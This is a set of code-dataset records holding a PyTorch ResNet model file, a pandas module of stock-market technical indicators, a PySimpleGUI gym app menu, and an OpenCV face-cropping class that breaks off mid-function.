neck_channels, 3, 2, 1, bias=False))\n stem.append(nn.BatchNorm2d(neck_channels))\n stem.append(nn.ReLU(inplace=True))\n stem.append(nn.Conv2d(neck_channels, neck_channels, 3, 1, 1, bias=False))\n stem.append(nn.BatchNorm2d(neck_channels))\n stem.append(nn.ReLU(inplace=True))\n stem.append(nn.Conv2d(neck_channels, out_channels, 3, 1, 1, bias=False))\n else:\n raise ValueError('deep and wide stem is not supported')\n stem.append(nn.BatchNorm2d(out_channels))\n stem.append(nn.ReLU(inplace=True))\n stem.append(nn.MaxPool2d(3, 2, 0, ceil_mode=True))\n return nn.Sequential(*stem)\n\n\ndef residual_stem(block, in_channels, out_channels, layers, stride):\n if layers == 0:\n return nn.Sequential()\n seq = []\n seq.append(block(in_channels, 
out_channels, stride))\n for i in range(1, layers):\n seq.append(block(out_channels, out_channels, 1))\n return nn.Sequential(*seq)\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, layers, base_channels, bottleneck,\n shrink=4, num_groups=1,\n deep_stem=False, narrow_stem=False, pre_act=False,\n use_se=False, avg_down=False, neck_down=False, zero_gamma=False,\n num_classes=1000):\n super(ResNet, self).__init__()\n if len(layers) < 2:\n raise ValueError('len(layers) = {} < 2'.format(len(layers)))\n self.num_layers = len(layers)\n\n if not bottleneck:\n mul = [1, 1]\n else:\n mul = [1, 4]\n for _ in range(len(layers) - 1):\n mul.append(mul[-1] * 2)\n channels = [m * base_channels for m in mul]\n\n self.input_stem = input_stem(3, channels[0], deep_stem, narrow_stem)\n Block = {\n (False, False): BasicBlockV1,\n (False, True): BasicBlockV2,\n (True, False): BottleneckV1,\n (True, True): BottleneckV2,\n }[(bottleneck, pre_act)]\n block = partial(Block, shrink=shrink, num_groups=num_groups, avg_down=avg_down, neck_down=neck_down)\n self.layer1 = residual_stem(block, channels[0], channels[1], layers[0], stride=1)\n for i in range(len(layers) - 1):\n lay = layers[i + 1]\n in_ch = channels[i + 1]\n out_ch = channels[i + 2]\n self.add_module('se{}'.format(i + 1), SqueezeExcitation(in_ch) if use_se else nn.Sequential())\n self.add_module('layer{}'.format(i + 2), residual_stem(block, in_ch, out_ch, lay, stride=2))\n\n if not pre_act:\n self.output_stem = nn.Sequential()\n else:\n self.output_stem = nn.Sequential(\n nn.BatchNorm2d(channels[4]),\n nn.ReLU(inplace=True),\n )\n self.avgpool = get_gapool_op(7)\n self.view = get_flatten_op()\n self.fc = nn.Linear(channels[-1], num_classes)\n\n # initialize\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n init_weight(m)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n if zero_gamma:\n for i, layer in enumerate([self.layer1, self.layer2, self.layer3, self.layer4]):\n for j, block in enumerate(layer):\n if type(block) in (BasicBlockV1, BasicBlockV2):\n block.bn2.weight.data.zero_()\n elif type(block) in (BottleneckV1, BottleneckV2):\n block.bn3.weight.data.zero_()\n elif type(block) == SqueezeExcitation:\n pass\n else:\n raise RuntimeError('layer {} block {} has unknown type for zero_gamma: {}'.format(\n i, j, type(block)))\n\n def forward(self, x, forward_mode='cls'):\n if forward_mode == 'cls':\n return self.forward_cls(x)\n if forward_mode == 'det':\n return self.forward_det(x)\n raise ValueError('unknown forward_mode: {}'.format(forward_mode))\n\n def forward_cls(self, x):\n x = self.input_stem(x)\n x = self.layer1(x)\n for i in range(self.num_layers - 1):\n x = getattr(self, 'se{}'.format(i + 1))(x)\n x = getattr(self, 'layer{}'.format(i + 2))(x)\n x = self.output_stem(x)\n x = self.avgpool(x)\n x = self.view(x)\n x = self.fc(x)\n return x\n\n def forward_det(self, x):\n x = self.input_stem(x)\n feature_maps = [x]\n x = self.layer1(x)\n for i in range(self.num_layers - 1):\n x = getattr(self, 'se{}'.format(i + 1))(x)\n x = getattr(self, 'layer{}'.format(i + 2))(x)\n feature_maps.append(x)\n return tuple(feature_maps)\n\n def get_cls_head(self):\n return self.fc\n\n def only_keep_cls_backbone(self):\n self.fc = nn.Sequential()\n return self\n\n def only_keep_cnn_backbone(self):\n self.avgpool = nn.Sequential()\n self.view = nn.Sequential()\n self.fc = nn.Sequential()\n return self\n\n def change_output_classes(self, num_classes, keep_if_same=True):\n if not isinstance(self.fc, 
nn.Linear):\n raise NotImplementedError('Now self.fc is not nn.Linear.')\n if num_classes != self.fc.out_features or not keep_if_same:\n fc = nn.Linear(self.fc.in_features, num_classes)\n init_weight(fc)\n if self.fc.weight.is_cuda:\n fc.cuda(self.fc.weight.device)\n assert fc.weight.device == self.fc.weight.device\n self.fc = fc\n return self\n\n def change_input_channels(self, in_channels):\n old_conv = self.input_stem[0]\n if in_channels != old_conv.in_channels:\n new_conv = nn.Conv2d(\n in_channels, old_conv.out_channels,\n old_conv.kernel_size, old_conv.stride, old_conv.padding,\n old_conv.dilation,\n old_conv.groups,\n old_conv.bias is not None,\n old_conv.padding_mode,\n )\n init_weight(new_conv)\n if old_conv.weight.is_cuda:\n new_conv.cuda()\n self.input_stem[0] = new_conv\n\n def load_state_dict(self, state_dict, *args, **kwargs):\n # load the parameters of old-version SE\n # where the `mlp` contains nn.Linear rather than nn.Conv2d\n pattern = 'se\\d\\.mlp\\.\\d\\.weight' # noqa\n for key, value in list(state_dict.items()):\n if re.fullmatch(pattern, key) and value.dim() == 2:\n state_dict[key] = value.unsqueeze(-1).unsqueeze(-1)\n super(ResNet, self).load_state_dict(state_dict, *args, **kwargs)\n\n\ndef __resnet__(model_name, layers, base_channels, bottleneck,\n shrink, num_groups,\n deep_stem, narrow_stem, pre_act,\n use_se, avg_down, neck_down):\n def f(pretrained=False, zero_gamma=False, num_classes=1000):\n model = ResNet(layers, base_channels, bottleneck,\n shrink, num_groups,\n deep_stem, narrow_stem, pre_act,\n use_se, avg_down, neck_down, zero_gamma,\n num_classes)\n if pretrained:\n import pdb; pdb.set_trace()\n return model\n\n f.__doc__ = \\\n \"\"\"Constructs a {} model.\n\n Structure Arguments:\n layers: {}\n base_channels: {}\n bottleneck: {}\n shrink: {}\n num_groups: {}\n deep_stem: {}\n narrow_stem: {}\n pre_act: {}\n use_se: {}\n avg_down: {}\n neck_down: {}\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n zero_gamma (bool): If True, zero-initialize the weight of last bn in each residual block\n num_classes (int): Number of output classes\n \"\"\".format(model_name, layers, base_channels, bottleneck,\n shrink, num_groups,\n deep_stem, narrow_stem, pre_act,\n use_se, avg_down, neck_down)\n\n return f\n\n\nse_configs = [\n ['', {'use_se': False}],\n ['se_', {'use_se': True}],\n]\nlayer_configs = [\n ['18', {'layers': [2, 2, 2, 2], 'bottleneck': False}],\n ['34', {'layers': [3, 4, 6, 3], 'bottleneck': False}],\n ['50', {'layers': [3, 4, 6, 3], 'bottleneck': True}],\n ['101', {'layers': [3, 4, 23, 3], 'bottleneck': True}],\n ['152', {'layers': [3, 8, 36, 3], 'bottleneck': True}],\n]\nversion_configs = [\n ['v1', {'pre_act': False}],\n ['v2', {'pre_act': True}],\n]\ntweak_configs = [\n ['a', {'deep_stem': False, 'narrow_stem': False, 'avg_down': False, 'neck_down': False}],\n ['b', {'deep_stem': False, 'narrow_stem': False, 'avg_down': False, 'neck_down': True}],\n ['c', {'deep_stem': True, 'narrow_stem': True, 'avg_down': False, 'neck_down': True}],\n ['d', {'deep_stem': True, 'narrow_stem': True, 'avg_down': True, 'neck_down': True}],\n]\nwidth_configs = [\n ['_4by1', {'base_channels': 256}],\n ['_2by1', {'base_channels': 128}],\n ['', {'base_channels': 64}],\n ['_1by2', {'base_channels': 32}],\n ['_3by8', {'base_channels': 24}],\n ['_1by4', {'base_channels': 16}],\n ['_1by8', {'base_channels': 8}],\n ['_1by16', {'base_channels': 4}],\n]\ngroup_configs = [\n ['', {'num_groups': 1}],\n ['_g2', {'num_groups': 2}],\n ['_g4', 
{'num_groups': 4}],\n ['_g8', {'num_groups': 8}],\n ['_g16', {'num_groups': 16}],\n ['_g32', {'num_groups': 32}],\n ['_g64', {'num_groups': 64}],\n]\nshrink_configs_1 = [\n ['', {'shrink': 1}],\n]\nshrink_configs_2 = [\n ['_s1', {'shrink': 1}],\n ['_s2', {'shrink': 2}],\n ['', {'shrink': 4}],\n ['_s8', {'shrink': 8}],\n]\nshrink_configs_dict = {\n '18': shrink_configs_1,\n '34': shrink_configs_1,\n '50': shrink_configs_2,\n '101': shrink_configs_2,\n '152': shrink_configs_2,\n}\nlocal = locals()\nfor SE, se in se_configs:\n for LAY, lay in layer_configs:\n for VER, ver in version_configs:\n for TW, tw in tweak_configs:\n for WID, wid in width_configs:\n for GRP, grp in group_configs:\n for SHR, shr in shrink_configs_dict[LAY]:\n if LAY in ['18', '34']:\n min_neck_channels = round(wid['base_channels'] / shr['shrink'])\n else:\n min_neck_channels = round(wid['base_channels'] * 4 / shr['shrink'])\n if min_neck_channels % grp['num_groups'] != 0:\n continue\n model_name = '{SE}resnet{LAY}_{VER}{TW}{WID}{SHR}{GRP}'.format(\n SE=SE, LAY=LAY, VER=VER, TW=TW, WID=WID, SHR=SHR, GRP=GRP,\n )\n assert model_name not in local\n local[model_name] = __resnet__(\n 'gluon.' + model_name,\n **lay, **wid, **ver, **tw, **se, **shr, **grp,\n )\n __all__.append(model_name)\n\n\nstd_nick_names = []\nstd_nick_names.extend([\n ('resnet18_v1b', 'resnet18'),\n ('resnet34_v1b', 'resnet34'),\n ('resnet50_v1b', 'resnet50'),\n ('resnet101_v1b', 'resnet101'),\n ('resnet152_v1b', 'resnet152'),\n])\nfor lay in ('50', '101', '152'):\n std_nick_names.extend([\n ('resnet{}_v1b'.format(lay), 'resnext{}_1x64d'.format(lay)),\n ('resnet{}_v1b_g2'.format(lay), 'resnext{}_2x32d'.format(lay)),\n ('resnet{}_v1b_g4'.format(lay), 'resnext{}_4x16d'.format(lay)),\n ('resnet{}_v1b_g8'.format(lay), 'resnext{}_8x8d'.format(lay)),\n ('resnet{}_v1b_g16'.format(lay), 'resnext{}_16x4d'.format(lay)),\n ('resnet{}_v1b_g32'.format(lay), 'resnext{}_32x2d'.format(lay)),\n ('resnet{}_v1b_g64'.format(lay), 'resnext{}_64x1d'.format(lay)),\n\n ('resnet{}_v1b_s2'.format(lay), 'resnext{}_1x128d'.format(lay)),\n ('resnet{}_v1b_s2_g2'.format(lay), 'resnext{}_2x64d'.format(lay)),\n ('resnet{}_v1b_s2_g4'.format(lay), 'resnext{}_4x32d'.format(lay)),\n ('resnet{}_v1b_s2_g8'.format(lay), 'resnext{}_8x16d'.format(lay)),\n ('resnet{}_v1b_s2_g16'.format(lay), 'resnext{}_16x8d'.format(lay)),\n ('resnet{}_v1b_s2_g32'.format(lay), 'resnext{}_32x4d'.format(lay)),\n ('resnet{}_v1b_s2_g64'.format(lay), 'resnext{}_64x2d'.format(lay)),\n\n ('resnet{}_v1b_s1'.format(lay), 'resnext{}_1x256d'.format(lay)),\n ('resnet{}_v1b_s1_g2'.format(lay), 'resnext{}_2x128d'.format(lay)),\n ('resnet{}_v1b_s1_g4'.format(lay), 'resnext{}_4x64d'.format(lay)),\n ('resnet{}_v1b_s1_g8'.format(lay), 'resnext{}_8x32d'.format(lay)),\n ('resnet{}_v1b_s1_g16'.format(lay), 'resnext{}_16x16d'.format(lay)),\n ('resnet{}_v1b_s1_g32'.format(lay), 'resnext{}_32x8d'.format(lay)),\n ('resnet{}_v1b_s1_g64'.format(lay), 'resnext{}_64x4d'.format(lay)),\n ])\nstd_nick_names.extend([\n ('resnet18_v1b_2by1', 'wide_resnet18_x2'),\n ('resnet18_v1b_4by1', 'wide_resnet18_x4'),\n ('resnet34_v1b_2by1', 'wide_resnet34_x2'),\n ('resnet34_v1b_4by1', 'wide_resnet34_x4'),\n ('resnet50_v1b_s2', 'wide_resnet50_x2'),\n ('resnet50_v1b_s1', 'wide_resnet50_x4'),\n ('resnet101_v1b_s2', 'wide_resnet101_x2'),\n ('resnet101_v1b_s1', 'wide_resnet101_x4'),\n ('resnet152_v1b_s2', 'wide_resnet152_x2'),\n ('resnet152_v1b_s1', 'wide_resnet152_x4'),\n])\nfor std_name, nick_name in std_nick_names:\n assert nick_name not in local\n 
local[nick_name] = local[std_name]\n __all__.append(nick_name)\n","repo_name":"bigvideoresearch/SCC","sub_path":"runner_master/runner/models/gluon/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":21039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"94"}
+{"seq_id":"4390303106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 23 11:06:53 2018\n\n@author: Eric Guo\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\n\n# True Range (TR) & Average True Range (ATR)\n# True Range (TR) is defined as the greatest of the following\n# Method 1: Current High less the current Low\n# Method 2: Current High less the previous Close (absolute value)\n# Method 3: Current Low less the previous Close (absolute value)\n# Current ATR = [(Prior ATR x 13) + Current TR] / 14\n# Or: moving average of the 14 TRs\n# untested, may be wrong\ndef calculate_atr(df_close, df_high, df_low, look_back=14):\n atr = lambda close, high, low: max((high[-1] - low[-1]), (high[-1] - close[-2]), (low[-1] - close[-2])).mean()\n # may be wrong\n df_atr = (df_close, df_high, df_low).rolling(window=look_back).apply(atr)\n return df_atr\n\n# Standard Deviation (STD)\ndef calculate_std(df_price, look_back):\n df_std = df_price.rolling(window=look_back).std()\n df_std = df_std[(look_back-1):]\n return df_std\n\n# Daily Returns (%)\ndef calculate_daily_returns(df_price):\n df_dr = (df_price / df_price.shift(1)) - 1\n df_dr.ix[0, :] = 0\n return df_dr\n\n# Sharpe Ratio\n# SR = (Mean portfolio return − Risk-free rate)/Standard deviation of portfolio return\n# SR_annual = sqrt(252) * SR_daily\n# SR_annual = sqrt(52) * SR_weekly\n# SR_annual = sqrt(12) * SR_monthly\ndef calculate_sharpe_ratio(df_daily_returns, risk_free_rate=0):\n years = df_daily_returns.index.year.unique()\n df_sr = pd.DataFrame(columns=df_daily_returns.columns.values)\n \n for year in years:\n str_year = str(year)\n series_sr = (df_daily_returns.loc[str_year].mean() - risk_free_rate) / df_daily_returns.loc[str_year].std()\n df_sr = df_sr.append(series_sr, ignore_index=True)\n df_sr.insert(0, column='year', value=years)\n df_sr.set_index('year', inplace=True)\n # convert daily to annually \n df_sr = df_sr * math.sqrt(252)\n return df_sr\n \n# Mean Absolute Deviation (MAD)\n# x[] = xi - x.mean()\n# MAD = x[].mean()\ndef calculate_mad(df_price, look_back):\n mad = lambda x: np.fabs(x - x.mean()).mean()\n df_mad = df_price.rolling(window=look_back).apply(mad)\n df_mad = df_mad[(look_back-1):]\n return df_mad\n\n# Simple Moving Average (SMA)\ndef calculate_sma(df_price, look_back):\n df_sma = df_price.rolling(window=look_back, min_periods=1).mean()\n df_sma = df_sma[(look_back-1):]\n return df_sma\n\n# Exponential Moving Average (EMA)\n# Initial SMA/EMA: 10-period sum / 10\n# Multiplier: (2 / (Time periods + 1) )\n# EMA: {Close - EMA(previous day)} x multiplier + EMA(previous day)\ndef calculate_ema(df_price, look_back=10):\n # df_sma = calculate_sma(df_closing_price, look_back)\n # multiplier = 2 / (look_back + 1)\n return df_price.ewm(span=look_back).mean()\n\n\n \n# Leading Indicators\n# Designed to lead price movements\n# Most represent a form of price momentum over a fixed lookback period\n# which is the number of periods used to calculate the indicator\n\n# Relative Strength Index (RSI)\n# Momentum oscillator that measures the speed and change of price movements.\n# Range: 0 - 100\n# RSI = 100 - 100 / (1 + RS)\n# RS = Average Gain / Average Loss\n# First Average Gain = Sum of Gains over the past 14 periods / 14\n# First Average Loss = Sum of Losses over the past 14 periods / 14\n# The second, and subsequent, calculations are based on the prior averages and the current gain loss\n# Average Gain = [(previous Average Gain) x 13 + current Gain] / 14\n# Average Loss = [(previous Average Loss) x 13 + 
current Loss] / 14\n# The default look-back period for RSI is 14\n# RSI is considered overbought when above 70 and oversold when below 30\ndef calculate_rsi(df, look_back=14):\n df_gain = df.copy()\n df_gain.where(df_gain > 0, 0, inplace=True)\n df_loss = df.copy()\n df_loss.where(df_loss < 0, 0, inplace=True)\n df_loss = df_loss.abs()\n \n # df_avg_gain[0, :] = df_gain.ix[:14, :].mean()\n df_avg_gain = df_gain.rolling(window=look_back, min_periods=1).mean()\n df_avg_gain = df_avg_gain[(look_back-1):]\n df_avg_loss = df_loss.rolling(window=look_back, min_periods=1).mean()\n df_avg_loss = df_avg_loss[(look_back-1):]\n \n df_rs = df_avg_gain / df_avg_loss\n # print \"rs is: \", df_rs\n df_rsi = 100 - 100 / (1 + df_rs)\n # print \"rsi: \", df_rsi\n return df_rsi\n \n# Commodity Channel Index (CCI)\n# CCI = (Typical Price - 20-period SMA of TP) / (.015 x Mean Deviation)\n# Typical Price (TP) = (High + Low + Close) / 3\n# Constant = .015\n# As a coincident indicator\n# surges above +100 reflect strong price action that can signal the start of an uptrend\n# Plunges below -100 reflect weak price action that can signal the start of a downtrend.\n# As a leading indicator\n# chartists can look for overbought or oversold conditions that may foreshadow a mean reversion. \ndef calculate_cci(df_typical_price, look_back, constant=0.015):\n df_sma = calculate_sma(df_typical_price, look_back)\n df_mad = calculate_mad(df_typical_price, look_back)\n df_cci = (df_typical_price[(look_back-1):] - df_sma) / (constant * df_mad)\n return df_cci\n\n# Stochastic Oscillator\n\n# Williams %R\n\n# Lagging Indicators\n# Follow the price action and are commonly referred to as trend-following indicators. \n# Trend-following indicators work best when markets or securities develop strong trends.\n\n# Moving Averages (exponential, simple, weighted, variable)\n\n# Moving Average Convergence / Divergence (MACD)\n# MACD line: (12-day EMA - 26-day EMA)\n# Signal line: 9-day EMA of MACD line\n# MACD Histogram: MACD line - Signal line\n\n# Oscillator\n# An oscillator is an indicator that fluctuates above and below a centerline\n# or between set levels as its value changes over time.\n\n# Centered Oscillators - MACD, ROC \n# Banded Oscillators - RSI, Stochastic Oscillator, CCI\n\n# Rate of Change (ROC)\n# ROC = [(Close - Close n periods ago) / (Close n periods ago)] * 100\ndef calculate_roc(df_closing_price, look_back):\n roc = lambda x: (x[-1] - x[0]) / x[0] * 100\n df_roc = df_closing_price.rolling(window=look_back).apply(roc)\n df_roc = df_roc[(look_back-1):]\n return df_roc\n\n\n\n# *** Technical Overlays ***\n\n# http://stockcharts.com/school/doku.php?id=chart_school:technical_indicators\n \n# Bollinger Bands\n# Middle Band = 20-day simple moving average (SMA)\n# Upper Band = 20-day SMA + (20-day standard deviation of price x 2)\n# Lower Band = 20-day SMA - (20-day standard deviation of price x 2)\n# By default use 20-day moving average and multiplier of 2\n# Multiplier is set to 2.1 for 50-day SMA, 1.9 for 10-day SMA\n# According to Bollinger, the bands should contain 88-89% of price action, which makes a move outside the bands significant\ndef calculate_bollinger_bands(df_closing_price, look_back=20, std_multiplier=2):\n df_m = calculate_sma(df_closing_price, look_back)\n df_std = calculate_std(df_closing_price, look_back)\n df_u = df_m + (df_std * std_multiplier)\n df_l = df_m - (df_std * std_multiplier)\n return df_m, df_u, df_l\n\n# Chandelier Exit\n# Chandelier Exit (long) = 22-day High - ATR(22) x 3 \n# Chandelier Exit 
(short) = 22-day Low + ATR(22) x 3\n# By default uses 22-periods (22 trading days per month) and a multiplier of 3\n# not tested\ndef calculate_ce(df_close, df_high, df_low, look_back=22, multiplier=3):\n df_ce_long = df_high.rolling(window=look_back).max() - (calculate_atr(df_close, df_high, df_low, look_back) * multiplier)\n df_ce_short = df_low.rolling(window=look_back).min() + (calculate_atr(df_close, df_high, df_low, look_back) * multiplier)\n return df_ce_long, df_ce_short\n\n# Ichimoku Clouds\n# Tenkan-sen (Conversion Line): (9-period high + 9-period low)/2\n# Kijun-sen (Base Line): (26-period high + 26-period low)/2\n# Senkou Span A (Leading Span A): (Conversion Line + Base Line)/2\n# Senkou Span B (Leading Span B): (52-period high + 52-period low)/2\n# Chikou Span (Lagging Span): Close plotted 26 days in the past\n# The Cloud (Kumo) is the most prominent feature of the Ichimoku Cloud plots\n# The Leading Span A (green) and Leading Span B (red) form the Cloud\n# the trend is up when prices are above the Cloud\n# the trend is down when prices are below the Cloud\n# and flat when prices are in the Cloud\n# the uptrend is strengthened when the Leading Span A (green cloud line) is rising and above the Leading Span B (red cloud line). This situation produces a green Cloud\n# a downtrend is reinforced when the Leading Span A (green cloud line) is falling and below the Leading Span B (red cloud line). This situation produces a red Cloud\n# untested\ndef calculate_ichimoku(df_close, df_high, df_low, look_back_tenkan=9, look_back_kijun=26, look_back_senkou=52, look_back_chikou=26):\n df_tenkan = (df_high.rolling(window=look_back_tenkan).max() + df_low.rolling(window=look_back_tenkan).min()) / 2\n df_kijun = (df_high.rolling(window=look_back_kijun).max() + df_low.rolling(window=look_back_kijun).min()) / 2\n df_senkou_a = (df_tenkan + df_kijun) / 2\n df_senkou_b = (df_high.rolling(window=look_back_senkou).max() + df_low.rolling(window=look_back_senkou).min()) / 2\n df_chikou = df_close.shift(-look_back_chikou) # negative shift plots the close look_back_chikou periods back\n return df_tenkan, df_kijun, df_senkou_a, df_senkou_b, df_chikou\n\n# Kaufman's Adaptive Moving Average (KAMA)\n# Efficiency Ratio (ER) = Change / Volatility\n# Change = ABS(Close - Close (10 periods ago))\n# Volatility = Sum10(ABS(Close - Prior Close))\n# Volatility is the sum of the absolute value of the last ten price changes (Close - Prior Close)\n# Smoothing Constant (SC)\n# SC = [ER x (fastest SC - slowest SC) + slowest SC]^2\n# SC = [ER x (2/(2+1) - 2/(30+1)) + 2/(30+1)]^2\n# Current KAMA = Prior KAMA + SC x (Price - Prior KAMA)\ndef calculate_kama(df_close, look_back_change=10, look_back_volatility=10, fast_sc=2, slow_sc=30):\n # Efficiency Ratio (ER)\n df_change = df_close.diff(look_back_change).abs()\n df_daily_volatility = (df_close - df_close.shift(1)).abs()\n df_volatility = df_daily_volatility.rolling(window=look_back_volatility).sum()\n df_er = df_change / df_volatility\n # Smoothing Constant (SC)\n df_sc = (df_er * (2 / (fast_sc + 1) - 2 / (slow_sc + 1)) + 2 / (slow_sc + 1)) ** 2\n # KAMA: recursive filter seeded with the SMA of the first look_back_change closes\n df_kama = pd.DataFrame(index=df_close.index[look_back_change:], columns=df_close.columns, dtype=float)\n prior = df_close.iloc[0:look_back_change].mean()\n for idx in df_kama.index:\n prior = prior + df_sc.loc[idx] * (df_close.loc[idx] - prior)\n df_kama.loc[idx] = prior\n return df_kama\n\n# Keltner Channels\n# Middle Line: 20-day exponential moving average \n# Upper Channel Line: 20-day EMA + (2 x ATR(10))\n# Lower Channel Line: 20-day EMA - (2 x ATR(10))\n# untested\ndef calculate_kc(df_close, df_high, df_low, look_back_ema=20, look_back_atr=10, multiplier=2):\n df_m = calculate_ema(df_close, look_back=look_back_ema)\n df_atr = calculate_atr(df_close, df_high, df_low, look_back_atr)\n df_u = df_m + (multiplier * df_atr)\n df_l = df_m - (multiplier * df_atr)\n return df_m, df_u, df_l\n\n# Moving Average Envelopes\n# Upper Envelope: 20-day SMA + (20-day SMA x .025)\n# Lower Envelope: 20-day SMA - (20-day SMA x .025)\n# untested\ndef calculate_mae(df_price, look_back=20, multiplier=0.025):\n df_m = calculate_sma(df_price, look_back)\n df_u = df_m * (1 + multiplier)\n df_l = df_m * (1 - multiplier)\n return df_m, df_u, df_l\n\n ","repo_name":"EGAILab/DDTrading","sub_path":"TechnicalIndicators.py","file_name":"TechnicalIndicators.py","file_ext":"py","file_size_in_byte":11624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
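# A small self-contained check of the Bollinger-band arithmetic documented in the record above (20-period SMA plus/minus two standard deviations); the random-walk series is an invented example, not data from the repo:
import numpy as np
import pandas as pd

rng = np.random.default_rng(0)
close = pd.Series(100 + rng.standard_normal(60).cumsum())

mid = close.rolling(window=20).mean()
std = close.rolling(window=20).std()
upper, lower = mid + 2 * std, mid - 2 * std

# by construction the middle band sits halfway between the envelopes
assert np.allclose(((upper + lower) / 2).dropna(), mid.dropna())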
+{"seq_id":"38099825651","text":"import PySimpleGUI as sg\nfrom register import registerwindow\nfrom search import searchwindow\nfrom fitness import fitnesswindow\nfrom help import helpwindow\n\nsg.theme(\"DarkTeal2\")\n\nheading = [\n [sg.Text(\"City Gym App\",\n font=\"16\", justification='c', expand_x=True, pad=(12, 12))]\n]\n\ndescription = [\n [sg.Text('City Gym App allows you to efficiently manage users',\n font='14', justification='c', expand_x=True, pad=(16, 16))]\n]\n\nlayout = [[heading],\n [description],\n [sg.Stretch(), sg.Button('Register', pad=(16, 16)), sg.Button('Search', pad=(16, 16)),\n sg.Button('Fitness', pad=(16, 16)), sg.Button(\n 'Help', pad=(16, 16)), sg.Button('Quit', pad=(16, 16)),\n sg.Stretch()]\n ]\n\nwindow = sg.Window(\"City Gym\", layout, size=(600, 250))\n\nwhile True:\n event, values = window.read()\n\n if event == sg.WIN_CLOSED or event == 'Quit':\n break\n elif event == 'Register':\n registerwindow()\n elif event == 'Search':\n searchwindow()\n elif event == 'Fitness':\n fitnesswindow()\n elif event == 'Help':\n helpwindow()\n else:\n pass\n","repo_name":"mburuanthony/fitness","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"41457682656","text":"#author: Tomo Lapautre\n\nimport cv2\nimport numpy as np\n\nimport pathlib\nfrom pathlib import Path\nimport glob\nimport os\nfrom PIL import Image, ImageOps\n\nfrom main.constants import (\n PNGS,\n CV2_FILETYPES,\n DNN_THRESHOLD,\n FAILED_IMAGE_FOLDER) \n\n\n\nclass FaceCrop():\n \n def __init__(self, height, width, height_asy, width_asy, tag='A', pyqt_ui=None):\n \n self.width = width #The width of the cropped image, expressed as a percentage of the initial image width. (Int between 0 and 100)\n self.width_asy = width_asy #The horizontal assymmetry of the cropping area relative to the position of the face. \n #Positive values will shift the image to the left of the face and negative values to the right (Integers)\n self.height = height #The height of the cropped image, expressed as a percentage of the initial image height. (Int between 0 and 100)\n self.height_asy = height_asy #The vertical assymmetry of the cropped area relative to the position of the face. \n #Positive values will shift the image down from the face and negative values will shift the image up (Integers).\n self.tag = tag #The program will save the cropped image with its original file name + the file tag. Ex: IMG001 is saved as IMG001_A for a file tag of 'A'. Optional.\n self.failure_folder = FAILED_IMAGE_FOLDER #folder where images where faces couldn't be detected will be stored\n self.threshold = DNN_THRESHOLD #threshold of confidence to categorise as a face\n self.progress_count = 0 #to keep track of progress bar\n self.pyqt_ui = pyqt_ui #this variable is to integrate this class to your pyqt GUI so that, for example you can generate a progress bar\n\n #files of the trained neural network given by cv2\n self.modelFile = \"main/res10_300x300_ssd_iter_140000.caffemodel\"\n self.configFile = \"main/deploy.prototxt.txt\"\n self.net = cv2.dnn.readNetFromCaffe(self.configFile, self.modelFile)\n\n\n #finds the face and saves the cropped face in your output directory\n def crop_save(self, input_directory, output_path, bool_folder=False, bool_face_count=False, preview=False):\n #if 'bool_face_count' is set to True, program will only save one face per image (the one with the highest confidence)\n #if 'bool_folder' is set to True, program will save the new image in its seperate folder. 
This can be useful if you have multiple faces per image.\n #if 'preview' is set to True, only crops the first face it can find and returns the image.\n\n folder_name = pathlib.PurePath(input_directory).name\n files = glob.glob('{}/*'.format(input_directory)) #finds all the files in your directory\n\n if self.tag:\n self.tag = \"_\" + self.tag \n \n #loops through all the files in the directory\n for i, file in enumerate(files):\n \n #updates the pyqt progress bar\n if not preview and self.pyqt_ui is not None:\n self.progress_count += 1\n self.pyqt_ui.progress.setValue(self.progress_count)\n \n #breaks program if user clicks on cancel button of progress bar\n if self.pyqt_ui.progress.wasCanceled():\n break\n \n \n file_path = Path(file)\n file_name = file_path.stem\n ext = file_path.suffix\n\n #checks if image is readable by cv2\n if ext.lower() not in CV2_FILETYPES:\n continue\n \n image = cv2.imdecode(np.fromfile(file, dtype=np.uint8), cv2.IMREAD_COLOR)\n \n try:\n img_height, img_width = image.shape[:2]\n except AttributeError:\n print('{}: ImageReadError'.format(file_name))\n continue\n \n blob = cv2.dnn.blobFromImage(cv2.resize(image, (300, 300)), 1.0, (300, 300), (104.0, 117.0, 123.0)) #resize image\n self.net.setInput(blob)\n faces = self.net.forward()\n \n #reload image using PIL as cv2 isn't adapted in this scenario to read PNGs properly. This increases the length of operation but is the only solution I could find.\n #(cv2 can read pngs by specifying cv2.IMREAD_UNCHANGED but this is a double edged sword as you lose the EXIF data of the image as well)\n temp_file = np.asarray(ImageOps.exif_transpose(Image.open(file)))\n \n width_px = int((abs(self.width)*img_width)/100) #width of the output picture in pixel\n height_px = int((abs(self.height)*img_height)/100) #height of the output picture in pixel\n \n k = 0 #'k' keeps track of how faces pass the threshold test in an image\n \n if bool_face_count: #only saves the face with the highest confidence, which is the first one in the sorted array\n face_range = range(1)\n else:\n face_range = range(faces.shape[2])\n \n #loop through all the potential faces found the neural network\n for i in face_range:\n confidence = faces[0, 0, i, 2]\n if confidence > self.threshold: #checks if confidence is high enough\n k+=1\n \n box = faces[0, 0, i, 3:7] * np.array([img_width, img_height, img_width, img_height]) #transform face from proportion to pixels\n face = box.astype(\"int\")\n x0, y0, x1, y1 = face #coordinates of the face in pixel \n h = y1 - y0 #height of face\n w = x1 - x0 #width of face\n \n south = min(int(y0 + 0.5*h + ((50+self.height_asy)/100)*height_px), img_height) #southern border of our new cropped image\n\n #makes sure that north and south are not outside the original image\n if south - height_px < 0 and ext.lower() not in PNGS: \n south = height_px\n north = 0\n else:\n north = max(south - height_px, 0)\n \n west = max(int(x0 + 0.5*w - ((50+self.width_asy)/100)*width_px), 0) #western border of our new cropped image\n\n #makes sure that east and west are not outside the original image\n if west + width_px > img_width: \n west = img_width - width_px\n east = img_width\n else:\n east = min(west + width_px, 